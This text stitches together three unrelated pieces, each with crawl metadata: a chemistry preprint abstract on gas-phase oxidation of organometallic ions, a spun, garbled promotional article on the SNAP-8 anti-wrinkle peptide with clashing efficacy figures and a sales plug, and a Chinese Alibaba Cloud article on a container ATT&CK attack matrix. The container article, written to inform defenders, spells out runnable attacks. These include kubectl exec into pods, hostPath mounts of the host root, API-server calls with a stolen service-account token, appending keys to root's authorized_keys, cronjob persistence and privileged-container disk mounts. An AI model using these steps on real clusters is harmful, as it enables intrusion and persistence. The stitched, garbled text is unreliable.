Gas-Phase Oxidation of Reactive Organometallic Ions Anuj Joshi Sofia Donnecke Ori Granot Dongju Shin Scott Collins Irina Paci J Scott McIndoe 10.26434/chemrxiv.11909397.v1 https://chemrxiv.org/articles/Gas-Phase_Oxidation_of_Reactive_Organometallic_Ions/11909397 Analysis of highly reactive compounds at very low concentration in solution using electrospray ionization mass spectrometry requires the use of exhaustively purified solvents. It has generally been assumed that desolvation gas purity needs to be similarly high, and so most chemists working in this space have relied upon high purity gas. However, the increasingly competitiveness of nitrogen generators, which provide gas purity levels that vary inversely with flow rate, prompted an investigation of the effect of gas-phase oxygen on the speciation of ions. For moderately oxygen sensitive species such as phosphines, no gas-phase oxidation was observed. Even the most reactive species studied, the reduced titanium complex [Cp<sub>2</sub>Ti(NCMe)<sub>2</sub>]<sup>+</sup>[ZnCl<sub>3</sub>]<sup>–</sup> and the olefin polymerization precatalyst [Cp<sub>2</sub>Zr(µ-Me)<sub>2</sub>AlMe<sub>2</sub>]<sup>+</sup> [B(C<sub>6</sub>F<sub>5</sub>)<sub>4</sub>]<sup>–</sup>, only exhibited detectable oxidation when they were rendered coordinatively unsaturated through in-source fragmentation. Computational chemistry allowed us to find the most plausible pathways for the observed chemistry in the absence of observed intermediates. The results provide insight into the gas-phase oxidation of reactive species and should assure experimentalists that evidence of significant oxidation is likely a solution rather than a gas-phase process, even when relatively low-purity nitrogen is used for desolvation. 2020-02-28 13:13:52 Oxidation Mass spectrometry electrospray ionization decomposition oxygen olefin polymerization
|
{
"url": "https://chemrxiv.org/articles/11909397/1/citations/dc",
"source_domain": "chemrxiv.org",
"snapshot_id": "crawl=CC-MAIN-2020-24",
"warc_metadata": {
"Content-Length": "3679",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:MMZR54OJHG2GMTYH2C6WAOUE7SHZOADM",
"WARC-Concurrent-To": "<urn:uuid:cc5232d7-95fd-40a8-93e9-08ac1fd848b9>",
"WARC-Date": "2020-05-29T04:41:52Z",
"WARC-IP-Address": "52.209.14.153",
"WARC-Identified-Payload-Type": "text/plain",
"WARC-Payload-Digest": "sha1:UUAZSNYZIJP2HVOWSNITKGIFIWFN7R2K",
"WARC-Record-ID": "<urn:uuid:a4cb4702-ebe4-4ac4-b8e3-a6c39d351830>",
"WARC-Target-URI": "https://chemrxiv.org/articles/11909397/1/citations/dc",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:458d9016-600f-44aa-8dc7-95e599726aab>"
},
"warc_info": "isPartOf: CC-MAIN-2020-24\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May/June 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-190.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0
],
"line_end_idx": [
1877
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1877,
"ccnet_original_nlines": 0,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.27913278341293335,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.010840109549462795,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.28455284237861633,
"rps_doc_frac_unique_words": 0.6757990717887878,
"rps_doc_mean_word_length": 7.004566192626953,
"rps_doc_num_sentences": 12,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.765849590301514,
"rps_doc_word_count": 219,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.03324640914797783,
"rps_doc_frac_chars_top_3gram": 0.024771839380264282,
"rps_doc_frac_chars_top_4gram": 0.035202089697122574,
"rps_doc_books_importance": -150.03636169433594,
"rps_doc_books_importance_length_correction": -150.02915954589844,
"rps_doc_openwebtext_importance": -74.61458587646484,
"rps_doc_openwebtext_importance_length_correction": -74.61458587646484,
"rps_doc_wikipedia_importance": -48.71596145629883,
"rps_doc_wikipedia_importance_length_correction": -48.71595764160156
},
"fasttext": {
"dclm": 0.8381521105766296,
"english": 0.8315594792366028,
"fineweb_edu_approx": 2.878887891769409,
"eai_general_math": 0.9802745580673218,
"eai_open_web_math": 0.5084595084190369,
"eai_web_code": 0.050493061542510986
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "547.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Organic"
}
},
"secondary": {
"code": "541.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Physical and theoretical"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "5",
"label": "Evaluate"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-6,930,068,258,868,335,000
|
How Does SNAP-8 Work, And Does It Deserve Its Status?
How Does SNAP-8 Work, And Does It Deserve Its Status?
The peptide recognised as SNAP-8 is regarded by its scientific title, acetyl glutamyl heptapeptide-1. Its probable software in anti-wrinkle lotions is now becoming investigated. According to scientific tests, the qualities of SNAP 8 make it feasible for it to lessen the visual appearance of wrinkles manufactured by the purely natural getting old system of muscle contractions that occur throughout the day. Animal studies have proven significant consequences on the eyes and brow location. This merchandise is assumed to be a Botulinum Toxin substitute that is fewer harsh, far more charge-successful, and safer than the latter. SNAP 8 performs a perform equivalent to that of botulinum toxin in that it targets the creation of wrinkles, but it does so in a distinctive method.
Effects of the Assessments Conducted on the SNAP 8 Peptide
Researchers carried out a sequence of VIVO assays to verify how little peptides can ensure the SNARE complex’s steadiness. For the reason that of this, the scientists could observe the temperature balance of the reconstituted SNARE protein sophisticated and its generation. This observation assesses the efficacy of peptides intended like SNAP-25 N and their capacity to assemble with synaptobrein and syntaxin as section of the generated SNARE advanced. The final final result was that the short peptides originating from the N-terminal finish of SNP-25 could efficiently contend with the all-natural protein and protect against it from forming the SNARE advanced by modifying its steadiness. Scientists attained this outcome by altering the stability of the primary protein.
The exam members participated in still a different experiment. The cream that experts utilized experienced 10% SNAP 8 in its composition. Silicon impressions were being taken from the spot surrounding the eyes of 17 individuals in the review. Gurus received these impressions on silicon right before the commencing of the exam. The analyze contributors utilised the cream twice day-to-day, and then 28 days later on, researchers collected one more sample. The imprints have been examined applying command laser scanning microscopy to observe the alter in the skin surface area in between the sample attained in advance of remedy and the sample taken immediately after treatment method. Skin topography pictures were being generated to get hold of a three-dimensional standpoint of the samples. Immediately after managing wrinkles for 28 days, researchers found that the depth of the wrinkles experienced considerably diminished, as revealed in these photographs. A most lessen of 63.18 percent was noticed when applying the SNAP 8 solution containing 10 percent.
Operating of the SNAP 8 Peptides
The N-terminal conclude of SNAP-25 has been copied and pasted into SNAP 8. This intricate competes with SNAP-25 for a area inside the SNARE intricate, which then influences the development of the SNARE advanced. It is difficult for the vesicle to release neurotransmitters in a way that is both successful and successful when the SNARE sophisticated is just minimally destabilized. This destabilization lowers muscular contractions, which in change aids to avoid the development of lines and wrinkles. By blocking the production of SNARE complexes and the launch of catecholamine, it will also assistance reduce the physical appearance of great traces and wrinkles that are previously present. It was also demonstrated to inhibit the formation of wrinkles and lines in test participants when employed regularly.
Clinical research have demonstrated that working with SNAP 8 may well help decrease the physical appearance of wrinkles by as considerably as 63.13 percent all-around the eyes. In accordance to the final results of in vitro and in vivo testing, the SNAP-8 activity amount is about 30 p.c better than that of the dad or mum peptide Argireline.
If you want to uncover a trustworthy business that sells reliable products, pay a visit to this website. This company sells a single of the most qualitative and inexpensive peptides presently.
Leave a Reply
|
{
"url": "https://khannaonhealthblog.com/how-does-snap-8-work-and-does-it-deserve-its-status.html",
"source_domain": "khannaonhealthblog.com",
"snapshot_id": "crawl=CC-MAIN-2022-49",
"warc_metadata": {
"Content-Length": "67000",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:5MAY6UU7VFZSY6GIOUVOJRFUCLWQNM73",
"WARC-Concurrent-To": "<urn:uuid:4671d0ec-a5b1-4f2b-9f0b-0cab45614386>",
"WARC-Date": "2022-12-10T02:20:53Z",
"WARC-IP-Address": "104.21.32.223",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:72JY3JN3AXPB5NDNK4A4TCL6LPVAGGGI",
"WARC-Record-ID": "<urn:uuid:1d5008a7-db2c-49d9-87d2-1480ec8639c6>",
"WARC-Target-URI": "https://khannaonhealthblog.com/how-does-snap-8-work-and-does-it-deserve-its-status.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:15090642-e299-4e6a-aa2b-191cd8b27932>"
},
"warc_info": "isPartOf: CC-MAIN-2022-49\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-40\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
54,
55,
109,
110,
890,
891,
950,
951,
1728,
1729,
2792,
2793,
2826,
2827,
3639,
3640,
3983,
3984,
4177,
4178,
4180,
4181
],
"line_end_idx": [
54,
55,
109,
110,
890,
891,
950,
951,
1728,
1729,
2792,
2793,
2826,
2827,
3639,
3640,
3983,
3984,
4177,
4178,
4180,
4181,
4194
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4194,
"ccnet_original_nlines": 22,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.38471850752830505,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03887398913502693,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.13270777463912964,
"rps_doc_frac_unique_words": 0.5,
"rps_doc_mean_word_length": 5.305214881896973,
"rps_doc_num_sentences": 36,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.143579483032227,
"rps_doc_word_count": 652,
"rps_doc_frac_chars_dupe_10grams": 0.02370627038180828,
"rps_doc_frac_chars_dupe_5grams": 0.02370627038180828,
"rps_doc_frac_chars_dupe_6grams": 0.02370627038180828,
"rps_doc_frac_chars_dupe_7grams": 0.02370627038180828,
"rps_doc_frac_chars_dupe_8grams": 0.02370627038180828,
"rps_doc_frac_chars_dupe_9grams": 0.02370627038180828,
"rps_doc_frac_chars_top_2gram": 0.01590055041015148,
"rps_doc_frac_chars_top_3gram": 0.0069384197704494,
"rps_doc_frac_chars_top_4gram": 0.009251230396330357,
"rps_doc_books_importance": -280.4896240234375,
"rps_doc_books_importance_length_correction": -280.4896240234375,
"rps_doc_openwebtext_importance": -195.81771850585938,
"rps_doc_openwebtext_importance_length_correction": -195.81771850585938,
"rps_doc_wikipedia_importance": -140.88352966308594,
"rps_doc_wikipedia_importance_length_correction": -140.88352966308594
},
"fasttext": {
"dclm": 0.03769040107727051,
"english": 0.9490468502044678,
"fineweb_edu_approx": 2.2676539421081543,
"eai_general_math": 0.1951712965965271,
"eai_open_web_math": 0.37692832946777344,
"eai_web_code": 0.019772769883275032
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.6",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "615.857",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "6",
"label": "Promotional/Advertisement"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,756,790,413,014,447,000
|
国内首个云上容器ATT&CK攻防矩阵发布,阿里云助力企业容器化安全落地
本文涉及的产品
容器服务 Serverless 版 ACK Serverless,317元额度 多规格
容器镜像服务 ACR,镜像仓库100个 不限时长
简介: 本文对云上容器ATT&CK攻防矩阵做了详细阐述,希望能帮助开发和运维人员了解容器的安全风险和落地安全实践。
+关注继续查看
关键字:
Attack Matrix、ATT&CK、云原生、容器化、容器安全、K8S、Docker、阿里云、AK 泄露、恶意镜像、黑客入侵、运行时安全、镜像安全
容器化带来的安全隐患
过去的2019 年是企业容器化爆发的一年。据统计已经有超过 90% 的互联网企业正在部署或使用容器,希望能通过更为敏捷的方式快速响应市场需求。
然而,伴随着容器技术的快速发展,容器安全问题也逐渐成为企业所关注的话题,同时,开发和运维人员缺乏对容器的安全威胁和最佳实践的认识也可能会使业务从一开始就埋下安全隐患。Tripwire的调研显示,60%的受访者所在公司在过去的一年中发生过至少一起容器安全事故。在部署规模超过100个容器的公司中,安全事故的比例上升到了75%,由此可见,快速拥抱容器化带来的安全风险不容忽视。本文对云上容器ATT&CK矩阵做了详细阐述,希望能帮助开发和运维人员了解容器的安全风险和落地安全实践。
一、云上容器ATT&CK攻防矩阵概览
ATT&CK®框架(Reference ATTACK Matrix for Container on Cloud)是网络攻击中涉及的已知策略和技术的知识库。为便于企业构建容器化应用安全体系,阿里云在传统主机安全的基础上,围绕自建容器集群以及云原生容器服务场景,通过全面分析黑客攻击Docker和K8s的过程和手段,推出容器安全ATT&CK攻防矩阵,让黑客无所遁形,助力企业全面提升容器安全能力水位。
1.png
二、云上容器ATT&CK攻防矩阵详解
1. Initial Access/初始访问
1.1 云账号AK泄露
云平台安全是云服务(容器服务、VM服务)的基础,如果业务代码需要通过AccessKey的方式进行鉴权并与云服务通信,应至少为每个云服务创建子账号并赋予需要的最小权限,同时推荐使用云平台提供的角色(如阿里云RAM角色)进行认证和授权。在实践中我们发现,存在部分管理员在进行代码托管时,使用主账号AK(拥有全部云资源控制权限)并不慎将其泄露到公开仓库(如Github),进而导致其云服务遭受入侵的场景,针对这一风险点,需要企业在使用云原生服务及容器化应用的过程中时刻关注。
1.2 使用恶意镜像
部分容器开发者会使用公开的镜像源(如dockerhub)下载镜像并在业务环境中运行,但如果不慎使用了存在漏洞的镜像,会给业务带来安全风险。此外,攻击者时常会将恶意镜像部署到dockerhub,并通过诱导安装或链路劫持对企业进行供应链攻击。
示例:一个在Dockerhub中伪装成mysql的恶意镜像,同时携带了挖矿程序:
2挖矿程序.png
1.3 K8s API Server未授权访问
K8s API Server作为K8s集群的管理入口,通常使用8080和6443端口,其中8080端口无需认证,6443端口需要认证且有TLS保护。
如果开发者使用8080端口,并将其暴露在公网上,攻击者就可以通过该端口API,直接对集群下发指令,或访问/ui进入K8s集群管理dashboard,操作K8s实施破坏。
1.4 K8s configfile泄露
K8s configfile作为k8s集群的管理凭证,其中包含有关K8s集群的详细信息,包括它们API Server的地址和登录凭证。在购买托管容器服务时,云厂商会向用户提供该文件以便于用户可以通过kubectl对集群进行管理。如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等),就可以直接通过API Server接管K8s集群,带来风险隐患。
示例:阿里云容器服务K8s configfile:
3configfile.png
1.5 Docker daemon公网暴露
Docker以client-server模式工作,其中docker daemon服务在后台运行,负责管理容器的创建、运行和停止操作,并提供docker许多其他运行时功能。执行docker命令会调用一个客户端,该客户端通过Docker的REST API将命令发送到服务端(docker daemon)。
在Linux主机上,docker daemon监听它在/var/run/docker.sock中创建的unix socket。为了使docker daemon可管理,可以通过配置TCP socket将其暴露在网络中,一般情况下2375端口用于未认证的HTTP通信,2376用于可信的HTTPS通信。
如果管理员测试业务时配置不当导致docker.sock通过2375暴露在公网,攻击者即可通过该API接管docker服务。
示例:Docker daemon的2375端口的暴露:
docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
1.6 容器内应用漏洞入侵
同主机安全一样,容器中运行的应用侧漏洞(如WEB应用RCE漏洞、Redis未授权访问等)也会成为黑客的突破口,攻击者可以利用这些漏洞进入容器内部并发起进一步攻击。
1.7 Master节点SSH登录凭证泄露
常见的容器集群管理方式是通过登录Master节点或运维跳板机,然后再通过kubectl命令工具来控制k8s。在此情况下,前置节点的SSH凭证泄露或被攻破也会使K8s集群暴露在风险中。
4风险中.png
1.8 私有镜像库暴露
在容器化应用场景中,公司使用镜像来进行持续集成和自动化部署,这些镜像往往通过专用的私有镜像库来管理。暴露在公网的私有镜像库极有可能遭受攻击者入侵,并通过劫持供应链来渗透下游业务。
以Harbor为例,Harbor是一个用于存储和分发Docker镜像的企业级Registry开源服务器,集成了Docker Hub、Docker Registry、谷歌容器等。它提供了一个简单的GUI,允许用户根据自己的权限下载、上传和扫描镜像。在过去的数年里,Harbor逐渐受到人们的关注并成为CNCF的孵化项目,被企业广泛应用。Harbor在2019年披露了一个严重漏洞CVE-2019-16097,该漏洞允许攻击者通过发送恶意请求以管理员权限创建用户,从而接管Harbor。该漏洞利用方式简单,对暴露在公网的Harbor服务构成较大威胁。
2. Execution/执行
2.1 通过kubectl进入容器
Kubectl是一个管理k8s集群的命令行工具,kubectl在$HOME/.kube目录中寻找一个名为config的文件并连接API Server进行鉴权操作。攻击者可以通过kubectl exec指令在任意pod内部执行命令。
示例:kubectl exec进入pod内部执行指令:
xy@x-8 ~/D/t/K8s_demo> kubectl get pod
NAME READY STATUS RESTARTS AGE
app-1-wp-0 1/1 Running 0 182d
app-1-wp-1 1/1 Running 0 182d
myapp 1/1 Running 0 11d
myappnew 1/1 Running 0 11d
xy@x-8 ~/D/t/K8s_demo> kubectl exec -it myappnew /bin/bash
root@myappnew:/# whoami
root
2.2 创建后门容器
攻击者可通过拥有pods权限的用户创建基础镜像并利用其执行后续渗透操作。
示例:通过yaml文件创建pod,并将pod的根目录/挂载到容器/mnt目录下,操作宿主机文件:
xy@x-8 ~/D/test> cat mymaster.yaml
apiVersion: v1
kind: Pod
metadata:
name: myappnew
spec:
containers:
- image: nginx
name: container
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
xy@x-8 ~/D/test> kubectl create -f ~/Desktop/test/mymaster.yaml
pod/myappnew created
xy@x-8 ~/D/test> kubectl exec -it myappnew /bin/bash
root@myappnew:/# cd /mnt
root@myappnew:/mnt# ls
bin checkapp etc lib lost+found mnt proc run srv tmp var
boot dev home lib64 media opt root sbin sys usr
2.3 通过K8s控制器部署后门容器
Kubernetes中运行了一系列控制器(Controllers)来确保集群的当前状态与期望状态保持一致。例如,ReplicaSet控制器负责维护集群中运行的Pod数量;Node控制器负责监控节点的状态,并在节点出现故障时及时做出响应。
攻击者在拥有controllers权限情况下可以通过ReplicaSet/DaemonSet/Deplyment创建并维持后门容器。
示例:攻击者通过controllers攻击:
xy@x-8 ~/D/test> cat nginx-deploy.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx-test
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- image: nginx
name: container
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
xy@x-8 ~/D/test> kubectl apply -f nginx-deploy.yaml
deployment.apps/nginx-deployment created
xy@x-8 ~/D/test> kubectl get pods
NAME READY STATUS RESTARTS AGE
app-1-wp-0 1/1 Running 0 183d
app-1-wp-1 1/1 Running 0 183d
myapp 1/1 Running 0 12d
myappnew 1/1 Running 0 38m
nginx-deployment-b676778d6-lcz4p 1/1 Running 0 55s
2.4 利用Service Account连接API Server执行指令
Kubernetes区分用户和服务(Service Account)两种账户,其中用户账户便于管理员与集群交互,服务账号用于Pod进程调用Kubernetes API或其他外部服务。
K8s pod中默认携带服务账户的访问凭证,如果被入侵的pod存在高权限的用户,则容器中可以直接通过service account向K8s下发指令。
示例:service account在容器内部的默认路径:
cd /var/run/secrets/kubernetes.io/serviceaccount
示例:带凭证访问API server的方式:
curl -voa -s https://192.168.0.234:6443/version
# 以下命令相当于 kubectl get no
curl -s https://192.168.0.234:6443/api/v1/nodes?watch --header "Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tOGprZmQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2DydmljZS1hY2NvdW50LnVpZCI6Ijg4Y2ZmNmYzLWY0NzktMTFlOS1iZmY1LTJlYzU3MmZlMWRjOCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.OU740qNcSf0Z__vAO1XJWUw9fvNNI2e4LxHypkpzREmnqrK9UZ-rrp9tG8Vxbc65FlPFj9efdpfWYExxjDDQwQTi-5Afmk4EA6EH-4vEs4V1r4gb0za8cyPVSAjzmEh7uIMgQHVo7y32V_BqUd8cmBoTdgnTY8Nx2QvMClvoYvEWvDKhbMnQjWH1x5Z6jK0iNg7btlK_WXnz8-yU2a0-jgoZFZ8D_qX16mZJ_ZoxEwPNTeNR8pP1l3ebZGVqBQA1PIFVG4HOlYomZya_DWGleMRYpulnECtBOTYyswzCwN8qJUVsdv6yWH1blWHKzYrkcoDmp2r6QhekaG1KFoX_YA" --cacert ca.crt
2.5 带有SSH服务的容器
含有SSH服务的容器暴露了新的攻击面,由于暴力破解或者登录凭证泄露,攻击者可以进入到容器内部执行指令进行恶意操作。这种情况多见于自建容器或K8s环境(一些运维人员将容器当做VM使用)。此外当攻击者逃逸到node节点时可以通过添加账号或写入/.ssh/authorized_keys等方式利用SSH下发后续恶意指令。
2.6 通过云厂商CloudShell下发指令
针对VM和容器服务的管理,云服务商往往会提供沙箱化的便捷管理工具,在云账号凭证泄露的情况下,攻击者可以通过云厂商提供的API接管集群。此外云厂商沙箱本身的安全问题也会影响到用户集群安全。
示例:通过Cloud Shell管理集群:
5管理集群.png
3. Persistence/持久化
3.1 部署远控客户端
(参考2.3部分通过K8s控制器部署后门容器)攻击者通过K8s DaemonSet向每个Node中植入后门容器,这些容器可以设置为特权容器并通过挂载宿主机的文件空间来进一步向每个Node植入二进制并远控客户端,从而完成Node层持久化,且后续操作不会触发K8s层的审计策略。
3.2 通过挂载目录向宿主机写入文件
一种常见的容器逃逸方法,如果容器/Pod启动时将VM的核心目录以写权限挂载(如/root, /proc, /etc等),则攻击者进入容器后可以修改敏感文件进行逃逸,如利用/etc/crontab执行定时任务、修改/root/.ssh/authorized_keys获取SSH登录权限、读取其他进程空间内容等。
示例:不安全的目录挂载:
docker run -it -v /root:/root ubuntu /bin/bash
写入SSH凭证
(echo -e "\n\n";cat id_rsa_new.pub) >> /root/.ssh/authorized_keys
3.3 K8s cronjob持久化
Cronjob是K8s controller的一种,用于创建基于时间的调度任务(类似主机的/etc/crontab)。攻击者在获取controller create权限后可以创建cronjob实现持久化。
示例:cronjob持久化
xy@x-8 ~/D/test> cat cronjob.yaml
apiVersion: batch/v1beta1
kind: CronJob
metadata:
name: echotest
spec:
schedule: "*/1 * * * *"
jobTemplate:
spec:
template:
spec:
containers:
- name: container
image: nginx
args:
- /bin/sh
- -c
- echo test
restartPolicy: OnFailure
xy@x-8 ~/D/test> kubectl create -f cronjob.yaml
cronjob.batch/echotest created
xy@x-8 ~/D/test> kubectl get cronjobs
NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
echotest */1 * * * * False 3 26s 3m8s
3.4 在私有镜像库的镜像中植入后门
(参考1.8私有镜像库暴露)攻击者在接管企业私有镜像库之后,可以进行拉取私有镜像窃取信息、删除仓库中的镜像、替换仓库中的镜像、为已有镜像添加后门、在镜像服务中创建后门账号等恶意操作。
一种持久化攻击方式是在dockerfile中加入额外的恶意指令层来执行恶意代码,同时该方法可以自动化并具有通用性。同时在Docker镜像的分层存储中,每一层的变化都将以文件的形式保留在image内部,一种更为隐蔽的持久化方式是直接编辑原始镜像的文件层,将镜像中原始的可执行文件或链接库文件替换为精心构造的后门文件之后再次打包成新的镜像,从而实现在正常情况下无行为,仅在特定场景下触发的持久化工具。
3.5 修改核心组件访问权限
攻击者通过ConfigMap修改Kubelet使其关闭认证并允许匿名访问,或暴露API Server的未授权HTTP接口,使其在后续渗透过程中拥有持续的后门命令通道。
4. Privilege Escalation/权限提升
4.1 利用特权容器逃逸
Docker允许特权容器访问宿主机上的所有设备,同时修改AppArmor或SELinux的配置,使特权容器拥有与那些直接运行在宿主机上的进程几乎相同的访问权限。在这种情况下,攻击者从特权容器逃逸是极其容易实现的。
示例:将系统盘挂载到容器内部,读写宿主机文件:
root@d000b330717d:/# fdisk -l
Disk /dev/vda: 40 GiB, 42949672960 bytes, 83886080 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xe2eb87fa
Device Boot Start End Sectors Size Id Type
/dev/vda1 * 2048 83886046 83883999 40G 83 Linux
root@d000b330717d:/# mkdir /mnt1
root@d000b330717d:/# mount /dev/vda1 /mnt1
root@d000b330717d:/# cd /mnt1
root@d000b330717d:/mnt1# ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
4.2 K8s Rolebinding添加用户权限
K8s使用基于角色的访问控制(RBAC)来进行操作鉴权,允许管理员通过 Kubernetes API 动态配置策略。某些情况下运维人员为了操作便利,会对普通用户授予cluster-admin的角色,攻击者如果收集到该用户登录凭证后,可直接以最高权限接管K8s集群。少数情况下,攻击者可以先获取角色绑定(RoleBinding)权限,并将其他用户添加cluster-admin或其他高权限角色来完成提权。
4.3 利用挂载目录逃逸
参考(3.2通过挂载目录向宿主机写入文件),攻击者在容器内部可以利用挂载通道修改宿主机文件来实现逃逸。
4.4 利用操作系统内核漏洞逃逸
操作系统内核安全(如Linux内核)是容器安全体系的基石,是实现容器隔离设计的前提。内核漏洞的利用往往从用户空间非法进入内核空间开始,在内核空间赋予当前或其他进程高权限以完成提权操作。在云原生场景中,云厂商会在VM层为操作系统内核漏洞进行补丁修复,避免用户被已公开的内核漏洞攻击。
4.5 利用Docker漏洞逃逸
